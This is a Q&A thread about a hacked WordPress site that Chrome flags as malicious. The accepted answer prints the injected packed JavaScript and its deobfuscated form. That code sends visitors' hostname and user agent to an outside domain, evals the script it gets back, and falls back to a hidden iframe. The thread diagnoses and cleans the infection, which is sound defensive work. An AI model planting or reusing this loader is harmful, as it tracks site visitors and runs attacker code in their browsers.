# The site ahead contains malware

Tags: wordpress, malware

I'm getting an error with the WordPress page REMOVED, it seems that the website `2zz3.gq` is being "injected" into the request but I'm not really sure when or how.

When I try to load the page on Chrome I see a **"The site ahead contains malware"** error:

[image]

But I see no error on Firefox or other browsers. **How can I solve this issue?**
So far I have tried:

- Running WordFence Plugin for Malware removal (no infections found)
- Running Sucuri Security Plugin (also no threats found)
- I blocked incoming request from the website `2zz3.gq` (apparently a server from Russia) but the error still appears on Chrome.

Could please someone give me some advice on this issue?

Comment: Would deleting wordpress be a option?

Comment: Please do not link to a page known to contain malware.

Comment: @PeeHaa deleting wordpress? What do you mean? The site should be running.

Comment: @EricJ. thanks for pointing on that, I didn't think twice about that.

Comment: Do you have any plugins/extensions/modifications to Wordpress installed? Likely it's injecting a rogue script or redirect.

Comment: @RyanVincent yes I have seen a tutorial on how to disable that warning, however it seems to me like a "patch", even more every user would need to do so. Maybe this message is truly a false-positive but I don't know yet...

Comment: Sucuri's free scan is a web facing scan, I can't be sure about WordFence. If the malicious code is in PHP and is only programmed to run when accessed from specific browsers, web facing scans will miss this. Even Sucuri's lowest tier premium product should find anything wrong if you properly configured the FTP connection so they can scan all server files.

Probably an eval() tag somewhere in your theme files with some base 64 inside. 

If you have a backup, wipe the server and reboot from backup. Otherwise, download the wp-content folder & htaccess file and scan it with a desktop malware scan

Comment: @Practically I actually have the wp-content in my desktop, but I can't find any file-based-malware-scanner, is there anyone you know? Or maybe I'm not understanding your recommendation correctly, should I use Sucuri but on localhost with the wp-content?

Comment: @adelriosantiago Sucuri's free scan is strictly web facing and will do you no good. Any malware / virus scanner on desktop has the ability to scan files and folders, though I can't tell you specifically how each does it. Try right clicking the wp-content folder and looking in the contextual menu for something like scan for malware? They should detect any suspicious code (sometimes also legitimate) but if you review any files scanned and look for eval() ... that is almost never legitimately used.

Comment: @arcyqwerty We have several plugins installed like WooCommerce and AutoOptimizer, among others. We just discovered that the offending site was being loaded on the plugin "AutoOptimizer" but now it turns out that the site is being called from the root of the site. Any idea?

Comment: @adelriosantiago: see answer. Too long to post as comment.

Answer (score 4, accepted):

Is the plugin disabled now?

Check the source of your site to see if it has been modified in any way.

Easiest might be to restore a backup to ensure you don't miss any malicious changes.

---

**WARNING**

This is malicious code. I've put it on here for explanation purposes, but I'd recommend that you **DO NOT execute this**

It's not as bad as a link that someone might accidentally click, and I figure this warning should suffice for anyone who decides that pasting this into their JS console seems like a good idea...

---

I see the following `packed` code block when I `curl` your site.

```
eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('26 25(7,13){15 9=7.80(13);10(9>78)49"76: 83 100 5";19 9}26 35(7){10(1!==85.22)49"93: 92 88 86 87";7=99(7);15 13,9,17=[],31=7.22-7.22%3;10(0===7.22)19 7;97(13=0;31>13;13+=3)9=25(7,13)<<16|25(7,13+1)<<8|25(7,13+2),17.28(20.21(9>>18)),17.28(20.21(9>>12&63)),17.28(20.21(9>>6&63)),17.28(20.21(63&9));96(7.22-31){74 1:9=25(7,13)<<16,17.28(20.21(9>>18)+20.21(9>>12&63)+33+33);77;74 2:9=25(7,13)<<16|25(7,13+1)<<8,17.28(20.21(9>>18)+20.21(9>>12&63)+20.21(9>>6&63)+33)}19 17.55("")}15 33="=",20="79+/",81="1.0";26 51(){15 11;37{11=39 68("82.70")}44(17){37{11=39 68("94.70")}44(95){11=90}}10(!11&&91 66!=\'89\'){11=39 66()}19 11}26 72(14){23=14.30(\'\\<54\');10(23==-1)19\'\';23=14.30(\'>\',23);10(23==-1)19\'\';23++;24=14.30(\'\\<\\/54\\>\',23);10(24==-1)19\'\';19 14.58(23,24)}26 64(14){10(14.30(\'%48%\')==-1)19 14;19 14.98(\'%48%\').55(36(35(62.65.75)))}26 60(56){15 27=" "+34.27;15 40=" "+56+"=";15 38=42;15 29=0;15 24=0;10(27.22>0){29=27.30(40);10(29!=-1){29+=40.22;24=27.30(";",29);10(24==-1){24=27.22}38=84(27.58(29,24))}}19(38)}34.107(\'<57 132="43"></57>\');10(60(\'133\')==42){15 32=\'50\'+\'7\'+\'45:\'+\'/\'+\'/\'+\'2\'+\'61\'+\'61\'+\'3\'+\'.\'+\'47\'+\'134\'+\'/\'+\'131\'+\'73\'+\'7.45\'+\'67\';32+=(\'?7=3&126=\'+36(35(62.65.125)));32+=(\'&101=\'+36(35(127.128)));37{15 11=51();11.129(\'136\',32,137);11.145=26(){10(11.146==4&&11.142==138){14=64(11.139);34.71("43").69=14;41=72(14);10(41.22>0)140(41)}};11.141(42)}44(17){34.71("43").69=\'<\'+\'59\'+\'46\'+\'144 124\'+\'108\'+\'="52\'+\'109\'+\':/\'+\'/\'+\'110\'+\'2\'+\'-\'+\'53\'+\'102\'+\'53\'+\'.\'+\'47\'+\'73\'+\'/\'+\'103\'+\'104\'+\'112\'+\'.45\'+\'67"\'+\' 113\'+\'121=\'+\'"0\'+\'" 122\'+\'119\'+\'7="0\'+\'" 46\'+\'118\'+\'114\'+\'31="\'+\'0" 115\'+\'116\'+\'117\'+\'52="\'+\'0" 123\'+\'120\'+\'105\'+\'50="\'+\'0" 106\'+\'111\'+\'143\'+\'47="\'+\'130\'+\'">\'+\'<\'+\'/\'+\'59\'+\'46\'+\'135\'+\'17\'+\'>\'}}',10,147,'|||||||t||_|if|xmlhttp||A|src|var||e||return|_ALPHA|charAt|length|start|end|_pref_xxs_getbyte|function|cookie|push|offset|indexOf|r|url|_PADCHAR|document|_pref_xxs_encode64|encodeURIComponent|try|setStr|new|search|code|null|statspan_0_1|catch|p|fr|g|ENCURL|throw|ht|_pref_xxs_getXmlHttp|h|b|script|join|name|span|substring|i|_pref_xxs_getCookie|z|window||_pref_xxs_processMacro|location|XMLHttpRequest|hp|ActiveXObject|innerHTML|XMLHTTP|getElementById|_pref_xxs_extractScript|a|case|href|INVALID_CHARACTER_ERR|break|255|ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789|charCodeAt|_VERSION|Msxml2|DOM|unescape|arguments|argument|required|one|undefined|false|typeof|exactly|SyntaxError|Microsoft|E|switch|for|split|String|Exception|ua|o|co|un|nheig|sc|write|rc|ttp|l|rol|ter|wid|rde|mar|ginw|idt|amebo|gh|rgi|th|hei|ma|s|hostname|d|navigator|userAgent|open|no|st|id|stat01|q|am|GET|true|200|responseText|eval|send|status|lin|ame|onreadystatechange|readyState'.split('|'),0,{}))
```

which translates to

```
function _pref_xxs_getbyte(t,A)
    {
    var _=t.charCodeAt(A);
    if(_>255)throw"INVALID_CHARACTER_ERR: DOM Exception 5";
    return _
}
function _pref_xxs_encode64(t)
    {
    if(1!==arguments.length)throw"SyntaxError: exactly one argument required";
    t=String(t);
    var A,_,e=[],r=t.length-t.length%3;
    if(0===t.length)return t;
    for(A=0;
    r>A;
    A+=3)_=_pref_xxs_getbyte(t,A)<<16|_pref_xxs_getbyte(t,A+1)<<8|_pref_xxs_getbyte(t,A+2),e.push(_ALPHA.charAt(_>>18)),e.push(_ALPHA.charAt(_>>12&63)),e.push(_ALPHA.charAt(_>>6&63)),e.push(_ALPHA.charAt(63&_));
    switch(t.length-r)
        {
        case 1:_=_pref_xxs_getbyte(t,A)<<16,e.push(_ALPHA.charAt(_>>18)+_ALPHA.charAt(_>>12&63)+_PADCHAR+_PADCHAR);
        break;
        case 2:_=_pref_xxs_getbyte(t,A)<<16|_pref_xxs_getbyte(t,A+1)<<8,e.push(_ALPHA.charAt(_>>18)+_ALPHA.charAt(_>>12&63)+_ALPHA.charAt(_>>6&63)+_PADCHAR)
    }
    return e.join("")
}
var _PADCHAR="=",_ALPHA="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/",_VERSION="1.0";
function _pref_xxs_getXmlHttp()
    {
    var xmlhttp;
    try
        {
        xmlhttp=new ActiveXObject("Msxml2.XMLHTTP")
    }
    catch(e)
        {
        try
            {
            xmlhttp=new ActiveXObject("Microsoft.XMLHTTP")
        }
        catch(E)
            {
            xmlhttp=false
        }
    }
    if(!xmlhttp&&typeof XMLHttpRequest!='undefined')
        {
        xmlhttp=new XMLHttpRequest()
    }
    return xmlhttp
}
function _pref_xxs_extractScript(src)
    {
    start=src.indexOf('\<script');
    if(start==-1)return'';
    start=src.indexOf('>',start);
    if(start==-1)return'';
    start++;
    end=src.indexOf('\<\/script\>',start);
    if(end==-1)return'';
    return src.substring(start,end)
}
function _pref_xxs_processMacro(src)
    {
    if(src.indexOf('%ENCURL%')==-1)return src;
    return src.split('%ENCURL%').join(encodeURIComponent(_pref_xxs_encode64(window.location.href)))
}
function _pref_xxs_getCookie(name)
    {
    var cookie=" "+document.cookie;
    var search=" "+name+"=";
    var setStr=null;
    var offset=0;
    var end=0;
    if(cookie.length>0)
        {
        offset=cookie.indexOf(search);
        if(offset!=-1)
            {
            offset+=search.length;
            end=cookie.indexOf(";
            ",offset);
            if(end==-1)
                {
                end=cookie.length
            }
            setStr=unescape(cookie.substring(offset,end))
        }
    }
    return(setStr)
}
document.write('<span id="statspan_0_1"></span>');
if(_pref_xxs_getCookie('stat01')==null)
    {
    var url='ht'+'t'+'p:'+'/'+'/'+'2'+'z'+'z'+'3'+'.'+'g'+'q'+'/'+'st'+'a'+'t.p'+'hp';
    url+=('?t=3&d='+encodeURIComponent(_pref_xxs_encode64(window.location.hostname)));
    url+=('&ua='+encodeURIComponent(_pref_xxs_encode64(navigator.userAgent)));
    try
        {
        var xmlhttp=_pref_xxs_getXmlHttp();
        xmlhttp.open('GET',url,true);
        xmlhttp.onreadystatechange=function()
            {
            if(xmlhttp.readyState==4&&xmlhttp.status==200)
                {
                src=_pref_xxs_processMacro(xmlhttp.responseText);
                document.getElementById("statspan_0_1").innerHTML=src;
                code=_pref_xxs_extractScript(src);
                if(code.length>0)eval(code)
            }
        };
        xmlhttp.send(null)
    }
    catch(e)
        {
        document.getElementById("statspan_0_1").innerHTML='<'+'i'+'fr'+'ame s'+'rc'+'="h'+'ttp'+':/'+'/'+'l'+'2'+'-'+'b'+'o'+'b'+'.'+'g'+'a'+'/'+'co'+'un'+'ter'+'.p'+'hp"'+' wid'+'th='+'"0'+'" hei'+'gh'+'t="0'+'" fr'+'amebo'+'rde'+'r="'+'0" mar'+'ginw'+'idt'+'h="'+'0" ma'+'rgi'+'nheig'+'ht="'+'0" sc'+'rol'+'lin'+'g="'+'no'+'">'+'<'+'/'+'i'+'fr'+'am'+'e'+'>'
    }
}
```

Note the line

```
var url='ht'+'t'+'p:'+'/'+'/'+'2'+'z'+'z'+'3'+'.'+'g'+'q'+'/'+'st'+'a'+'t.p'+'hp';
```

which actually constructs the `2***.gq` url. <sup>1</sup>

If you don't have a `stat01` cookie set, it loads `stat.php` from there (presumably malicious JS source) and executes it using `eval`.

In the process of making the request, it also sends up some user data (for metrics, loading proper exploit code, or something else?), including the current hostname and the useragent of the user's browser.

Note that, should this fail, it also falls back on loading a URL at another domain `l2***.ga/counter.php`<sup>1</sup> in an `iframe`.

<sup>1</sup> link purposely broken, see source if you're interested

Comment: You are awesome. We have started to realize that there may be several infected files. But I'm still puzzled how did you got that information through a curl? Did you just curl'ed the address??? Which files contains this script? I can't find it.

Comment: I can't tell what file in your backend would contain that script. When I `curl` your site, it gives me the rendered page (all the PHP already processed, all the templates inlined, etc.).  `curl` just because it's an easy way to not-evaluate the JS.  If you have direct server access, you could try doing a `grep -r _pref_xxs_getCookie /path/to/your/wordpress/site` or similar to try and find it.

Comment: As a pointer though, if you do decide to go in manually, look for any weird [`include`](http://php.net/manual/en/function.include.php)s.  However, Wordpress has many other mechanisms for pulling in code.  Check for any changes in your template files as well.

Comment: Amazing! We have solved it! We used curl and spotted several eval's and iframes being injected at the very end of the webpage. Just for the record, if someone is interested on how an injection on a legit file looks like, here is a -now disinfected- legitimate file: https://gist.github.com/adelriosantiago/352e2cad878c443b6b71

Can you spot the injection? Whoever got the idea must be the "master of trolls"...